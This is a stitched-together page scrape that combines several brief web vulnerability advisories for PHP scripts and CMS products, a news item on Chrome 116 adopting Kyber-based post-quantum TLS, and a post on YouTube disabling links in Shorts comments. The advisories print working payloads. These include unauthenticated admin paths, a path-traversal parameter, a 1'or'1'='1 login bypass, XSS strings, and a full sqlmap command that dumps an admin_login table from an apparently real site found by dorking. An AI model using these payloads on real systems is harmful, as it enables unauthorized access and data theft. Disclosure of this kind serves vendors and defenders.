i2soft CMS version 2.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : i2soft CMS v2.0 Insecure Direct Object Reference Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.i2softbd.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload 1 : /Admin/menu.php[+] use payload 2 : Admin/container.php?p=../footer.html[+] now you can modify footer page or read other files[+] https://wtaazakhobor24com/Admin/container.php?p=../footer.htmlGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

i2soft CMS 2.0 Insecure Direct Object Reference

helloGTX Travel Portal CRM version 1.6 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : helloGTX Travel Portal CRM v1.6 Insecure Direct Object Reference Vulnerability                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.hellogtx.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/index/dashboard[+] Watch only without editing[+] https://wwholidaysbookerscom/admin/index/dashboardGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

helloGTX Travel Portal CRM 1.6 Insecure Direct Object Reference

FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Greeva 2.0 SQL Injection

Easy Web Portal version 2.1.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Easy Web Portal v2.1.1 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.p30vel.ir                                                                                               || # Dork      : EWP a été construit avec Easy Web Portal v2.1.1                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /tst/index.php .[+] URL encoded GET input admin was set to 0' onmouseover=prompt(976752) bad='[+] The input is reflected inside a tag parameter between single quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Web Portal 2.1.1 Cross Site Scripting

Easy Password Manager version 1.1 suffers from an administrative information disclosure vulnerability.

    ====================================================================================================================================| # Title     : Easy Password Manager v1.1 unauthorized administrative access Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codelist.cc/scripts/247302-password-manager-for-rise-crm-v11.html                                          |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  unauthorized access allows you to export all E-mail group .[+]  Use Payload : /export-all-mail-group-csv.php[+]  https://127.0.0.1/mother-of-mangrovecom/xicia/cc/epm/export-all-mail-group-csv.php  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Password Manager 1.1 Information Disclosure

Easy Member Pro version 3.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://easymemberpro30review.weebly.com/                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] allows for unauthorized administrative access , Causes partial control of the site control panel[+] use payload : 1 - /admin/memberleft.php                   2 - /admin/lefthome.php[+] http://127.0.0.1/easymemberprocom/admin/memberleft.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Member Pro 3.0 Insecure Direct Object Reference

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116.
"Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS, starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday.
Kyber was chosen by the U.S. Department of Commerce's

Encryption / Browser Security

Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116.

"Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS, starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday.

Kyber was chosen by the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) as the candidate for general encryption in a bid to tackle future cyber attacks posed by the advent of quantum computing. Kyber-768 is roughly the security equivalent of AES-192.

The encryption algorithm has already been adopted by Cloudflare, Amazon Web Services, and IBM.

X25519Kyber768 is a hybrid algorithm that combines the output of X25519, an elliptic curve algorithm widely used for key agreement in TLS, and Kyber-768 to create a strong session key to encrypt TLS connections.

"Hybrid mechanisms such as X25519Kyber768 provide the flexibility to deploy and test new quantum-resistant algorithms while ensuring that connections are still protected by an existing secure algorithm," O'Brien explained.

While it's expected to take several years, possibly even decades, for quantum computers to pose severe risks, certain kinds of encryption are susceptible to an attack called "harvest now, decrypt later" (aka retrospective decryption) in which data that's encrypted today is harvested by threat actors in hopes of decrypting it later when cryptanalysis becomes easier due to technological breakthroughs.

This is where quantum computers come in, as they are capable of efficiently performing certain computations in a manner that can trivially defeat existing cryptographic implementations.

"In TLS, even though the symmetric encryption algorithms that protect the data in transit are considered safe against quantum cryptanalysis, the way that the symmetric keys are created is not," O'Brien said.

"This means that in Chrome, the sooner we can update TLS to use quantum-resistant session keys, the sooner we can protect user network traffic against future quantum cryptanalysis."

Enterprises that face network appliance incompatibility issues following the rollout are advised to disable X25519Kyber768 in Chrome using the PostQuantumKeyAgreementEnabled enterprise policy, which is available starting in Chrome 116, as a temporary measure.

The development comes as Google said it's changing the release cadence of Chrome security updates from bi-weekly to weekly to minimize the attack window and address the growing patch gap problem that allows threat actors more time to weaponize published n-day and zero-day flaws.

"Bad actors could possibly take advantage of the visibility into these fixes and develop exploits to apply against browser users who haven't yet received the fix," Amy Ressler from the Chrome Security Team said. "That's why we believe it's really important to ship security fixes as soon as possible, to minimize this 'patch gap.'"

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Enhancing TLS Security: Google Adds Quantum-Resistant Encryption in Chrome 116

Categories: News
Tags: YouTube

Tags:  shorts

Tags:  video

Tags:  spam

Tags:  scam

Tags:  comments

Tags:  replies

Tags:  block

Tags:  remove

YouTube is making drastic changes to combat a a growing tide of spam comments on the Shorts video category.



(Read more...)




The post YouTube makes sweeping changes to tackle spam on Shorts videos appeared first on Malwarebytes Labs.

YouTube is rolling out unclickable links. 

Video portals like YouTube have had to deal with spam comments and bogus links for many years. With new additions to a platform come new places for scammers to go about their business. YouTube is now cracking down on links posted to the comments section of Shorts.

Shorts has been around for a few years now, but you may not have noticed the video format up until this point. They’re most commonly found on the frontpage of YouTube, in the form of horizontally framed Tik-Tok style clips. Clicking into a Shorts video will give you an endless, scrolling feed of seemingly random content. Some videos have hashtags you can click into, but for the most part it can feel like a chaotic, non-curated experience.

As with regular YouTube videos, users of the site can leave comments and replies to videos on Shorts, but that's introduced a new problem. So, YouTube introduced sweeping changes that will affect people who are trying to build out a Shorts platform. From the release detailing the changes:

> Since introducing Shorts two years ago, the volume and speed of content published on YouTube has increased in fun and exciting ways. At the same time, this speed and level of engagement has made it easier for spammers and scammers to share links in Shorts comments and Shorts descriptions that harm the community – for example, clickable links that drive users to malware, phishing, or scam-related content.

Essentially: if you build it (and by “it”, I mean “a rapid-fire barrage of non-stop content”) they will come (and by “they”, I mean “a cavalcade of spam the likes of which the moderation team simply cannot police”).

The list of link-related casualties is as follows:

> Starting on August 31st, 2023, links in Shorts comments, Shorts descriptions, and links in the vertical live feed will no longer be clickable - this change will roll out gradually. We don’t have any plans to make any other links unclickable. Because abuse tactics evolve quickly, we have to take preventative measures to make it harder for scammers and spammers to mislead or scam users via links.

YouTube also goes on to say that “clickable social media icons from all desktop channel banners will no longer show, as they can be a source of misleading links.” As The Verge notes, these links are used to direct content viewers to their accounts on other websites. Considering the Shorts platform is fairly limited in functionality to others of a similar nature, removing anything along these lines could cause issues for Shorts makers.

There are plans to replace these links with something, though there’s no word yet as to what form this may take. 

In 2022, one of YouTube's transparency reports showed that a big problem was in the realm of misinformation—122,000 videos (not channels) were removed for violating misinformation policies from an overall total of four million removals in Q2 2022. And 89 of these were removed due to being classed as “Spam, misleading, and scams.” The biggest reason for videos being removed was child safety, clocking 1,383,028 removals (31 percent of the overall tally).

With this in mind, it makes sense that YouTube would be keen to bring the banhammer down on a sudden rise in scams affecting the Shorts platform. The quick-cut video content is geared toward younger users; indeed, it’s popular with the 16 – 24 age group. The last thing YouTube or Google needs is a potential child safety issue spreading wildly out of control with rogue links and dubious comments lurking in potentially blink-and-you’ll-miss-it comments sections.

Ultimately, this could be a burden for Shorts creators, but it is a proactive move and anything which impacts the terrifying volume of spam on one of the biggest video platforms in the world can only be a good thing.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#google